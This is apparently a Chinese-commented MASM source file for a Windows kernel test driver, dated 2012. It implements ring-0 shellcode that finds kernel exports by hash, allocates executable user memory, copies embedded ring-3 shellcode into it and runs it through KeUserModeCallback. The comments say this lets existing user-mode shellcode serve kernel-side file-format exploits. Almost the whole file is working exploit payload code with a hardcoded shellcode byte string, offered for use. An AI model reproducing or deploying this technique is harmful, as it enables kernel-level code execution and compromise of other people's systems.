;r0 shellcode 有些文件型洞是在驱动中触发用这个方法可以让以前的r3 shellcode还有用
;具体实现是通过KeUserModeCallback在R0把R3的Shellcode移到应用层环境中执行,小需要
;注意的是KeUserModeCallback的调用有较大的条件限制要具体漏洞具体分析!!!
.386
.model flat, stdcall
option casemap:none
include \masm32\include\w2k\ntstatus.inc
include \masm32\include\w2k\ntddk.inc
include \masm32\include\w2k\ntoskrnl.inc
include \masm32\include\w2k\w2kundoc.inc
include \masm32\macros\Strings.mac
includelib \masm32\lib\w2k\ntoskrnl.lib
.const
IOCTL_CALLBCK equ 224000h
CCOUNTED_UNICODE_STRING "\\Device\\pdf0daytest", g_usDeviceName, 4
CCOUNTED_UNICODE_STRING "\\??\\pdf0daytest", g_usSymbolicLinkName, 4
.data
shellcodebuf db 1024 dup(0)
.code
MyShellcode proc
pushad
;int 3
;invoke DbgPrint, $CTA0("ntoskrnl addr:%08X\n"),eax
@@shellcodebegin:
call @@beginaddr
@@beginaddr:
PUSH 03H ;要调用的API函数个数
jmp @@realshellcode
;db 00h ;字节对齐,同时空四个00出来
myZwQueryInformationProcess dd 0b16fe439h ;[EDI-0CH]
myZwAllocateVirtualMemory dd 0d33d4aedh ;[EDI-08H]
myKeUserModeCallback dd 0c126d6e0h ;[EDI-04H]
BasicInfo PROCESS_BASIC_INFORMATION <>
ReturenLength dd 0
r3scbuf dd 0
r3scbuflen dd 1000H
ResultBuffer dd 0
ResultLentgh dd 0
argbuf dd 0
@@realshellcode:
POP ECX
POP EDI
SCASD ;edi+4
;SCASD ;edi+4
;得到ntoskrnl基地址
assume fs:nothing
mov eax,[fs:1ch]
mov eax,[EAX+34h]
add eax,18h
mov eax,[eax]
mov eax,[eax]
mov ebp,[eax+18h]
;处理导出表
@@next2:
PUSH ECX
MOV ESI,[EBP+3Ch]
MOV ESI,[EBP+ESI+78h]
ADD ESI,EBP
PUSH ESI
MOV ESI,[ESI+20h]
ADD ESI,EBP
XOR ECX,ECX
DEC ECX
@@next:
INC ECX
LODSD
ADD EAX,EBP
XOR EBX,EBX
@@again:
MOVSX EDX,BYTE PTR [EAX]
CMP DL,DH
JZ @@end
ROR EBX,0Dh
ADD EBX,EDX
INC EAX
JMP @@again
@@end:
CMP EBX,[EDI]
JNZ @@next
POP ESI
MOV EBX,[ESI+24h]
ADD EBX,EBP
MOV CX,WORD PTR [ECX*2+EBX]
MOV EBX,[ESI+1Ch]
ADD EBX,EBP
MOV EAX,[ECX*4+EBX]
ADD EAX,EBP
STOSD
POP ECX
loop @@next2
comment #
mov eax,[edi-08H]
invoke DbgPrint, $CTA0("zwallmemory addr:%08X\n"),eax
mov eax,[edi-04H]
invoke DbgPrint, $CTA0("keusermod addr:%08X\n"),eax
mov eax,[edi-0CH]
invoke DbgPrint, $CTA0("queryinfo addr:%08X\n"),eax
#
;PROCESS_BASIC_INFORMATION STRUCT ; sizeof = 18h
; ExitStatus NTSTATUS ?
; PebBaseAddress PVOID ? ; PPEB
; AffinityMask DWORD ?
; BasePriority DWORD ? ; KPRIORITY
; UniqueProcessId DWORD ?
; InheritedFromUniqueProcessId DWORD ?
;PROCESS_BASIC_INFORMATION ENDS
;PPROCESS_BASIC_INFORMATION typedef PTR PROCESS_BASIC_INFORMATION
lea eax,[edi+sizeof(PROCESS_BASIC_INFORMATION)]
push eax
push sizeof(PROCESS_BASIC_INFORMATION)
push edi
push ProcessBasicInformation ;0
or eax,-1
push eax
call dword ptr [EDI-0CH]
;assume edi:ptr PROCESS_BASIC_INFORMATION
;mov eax,[edi].PebBaseAddress
;assume edi:nothing
;invoke DbgPrint, $CTA0("peb addr:%08X\n"),eax
;ZwAllocateVirtualMemory(NtCurrentProcess(),&pBuf,0,&buflen,MEM_COMMIT,PAGE_EXECUTE_READWRITE);
push PAGE_EXECUTE_READWRITE
push MEM_COMMIT or MEM_RESERVE or MEM_TOP_DOWN
lea eax,[edi+sizeof(PROCESS_BASIC_INFORMATION)+8]
push eax
push 0
lea eax,[edi+sizeof(PROCESS_BASIC_INFORMATION)+4]
push eax
or eax,-1
push eax
call dword ptr [EDI-08H]
lea eax,[edi+sizeof(PROCESS_BASIC_INFORMATION)+4]
mov eax,[eax]
;invoke DbgPrint, $CTA0("mem addr:%08X\n"),eax
;copy r3 shellcode
mov ebx,eax
add eax,4
mov [ebx],eax
add ebx,4
call @@beginr3scaddr
@@beginr3scaddr:
jmp @@realshellcode2
sc db 0E8H,00H,00H,00H,00H,59H,0ebH,05H,'c',':','\','p',00H,83H,0c1H,03H,6Ah,00H,51H,0B8H,19H,062H,082H,7cH,0FFH,0D0H,0C2H,08H,00H
@@realshellcode2:
pop esi
add esi,2
mov ecx,8
@@nextcopyr3sc:
mov eax,[esi]
mov [ebx],eax
add esi,4
add ebx,4
loop @@nextcopyr3sc
;KeUserModeCallback(ApiIndex,Arguments,sizeof(ULONG)*(ARGUMENTSCOUNT+1),&ResultBuffer,&ResultLentgh);
assume edi:ptr PROCESS_BASIC_INFORMATION
mov eax,[edi].PebBaseAddress
assume edi:nothing
.if eax!=0
mov ebx,[eax+2ch] ;KernelCallBackTable
lea eax,[edi+sizeof(PROCESS_BASIC_INFORMATION)+4]
mov eax,[eax]
sub eax,ebx
shr eax,2 ;eax/4
mov ebx,eax ;apiindex
.else
jmp @@exitr0
.endif
lea eax,[edi+sizeof(PROCESS_BASIC_INFORMATION)+10h]
push eax
lea eax,[edi+sizeof(PROCESS_BASIC_INFORMATION)+0ch]
push eax
push 4
lea eax,[edi+sizeof(PROCESS_BASIC_INFORMATION)+14h]
push eax
push ebx
call dword ptr [EDI-04H]
@@exitr0:
popad
ret
MyShellcode endp
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; DispatchControl
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
DispatchControl proc uses esi edi ebx pDeviceObject:PDEVICE_OBJECT, pIrp:PIRP
local status:NTSTATUS
local dwBytesReturned:DWORD
and dwBytesReturned, 0
mov esi, pIrp
assume esi:ptr _IRP
IoGetCurrentIrpStackLocation esi
mov edi, eax
assume edi:ptr IO_STACK_LOCATION
.if [edi].Parameters.DeviceIoControl.IoControlCode == IOCTL_CALLBCK
invoke DbgPrint, $CTA0("IOCTL_CALLBCK\n")
invoke RtlMoveMemory,addr shellcodebuf,MyShellcode,1000d
lea eax,shellcodebuf ;模拟真实EXP环境
call eax
mov status, STATUS_SUCCESS
.else
mov status, STATUS_INVALID_DEVICE_REQUEST
.endif
assume edi:nothing
push status
pop [esi].IoStatus.Status
push dwBytesReturned
pop [esi].IoStatus.Information
assume esi:nothing
fastcall IofCompleteRequest, pIrp, IO_NO_INCREMENT
mov eax, status
ret
DispatchControl endp
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; DispatchCreateClose
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
DispatchCreateClose proc pDeviceObject:PDEVICE_OBJECT, pIrp:PIRP
mov eax, pIrp
assume eax:ptr _IRP
mov [eax].IoStatus.Status, STATUS_SUCCESS
and [eax].IoStatus.Information, 0
assume eax:nothing
fastcall IofCompleteRequest, pIrp, IO_NO_INCREMENT
mov eax, STATUS_SUCCESS
ret
DispatchCreateClose endp
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; DriverUnload
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
DriverUnload proc pDriverObject:PDRIVER_OBJECT
invoke IoDeleteSymbolicLink, addr g_usSymbolicLinkName
mov eax, pDriverObject
invoke IoDeleteDevice, (DRIVER_OBJECT PTR [eax]).DeviceObject
ret
DriverUnload endp
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; DriverBegin
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
.code INIT
DriverEntry proc pDriverObject:PDRIVER_OBJECT, pusRegistryPath:PUNICODE_STRING
local status:NTSTATUS
local pDeviceObject:PVOID
mov status, STATUS_DEVICE_CONFIGURATION_ERROR
invoke IoCreateDevice, pDriverObject, 0, addr g_usDeviceName, FILE_DEVICE_UNKNOWN, \
0, FALSE, addr pDeviceObject
.if eax == STATUS_SUCCESS
invoke IoCreateSymbolicLink, addr g_usSymbolicLinkName, addr g_usDeviceName
.if eax == STATUS_SUCCESS
mov eax, pDriverObject
assume eax:PTR DRIVER_OBJECT
mov [eax].MajorFunction[IRP_MJ_CREATE*(sizeof PVOID)],offset DispatchCreateClose
mov [eax].MajorFunction[IRP_MJ_CLOSE*(sizeof PVOID)],offset DispatchCreateClose
mov [eax].MajorFunction[IRP_MJ_DEVICE_CONTROL*(sizeof PVOID)], offset DispatchControl
mov [eax].DriverUnload, offset DriverUnload
assume eax:nothing
.endif
.endif
mov status, STATUS_SUCCESS
mov eax, status
ret
DriverEntry endp
end DriverEntry
2012年1月6日 20:29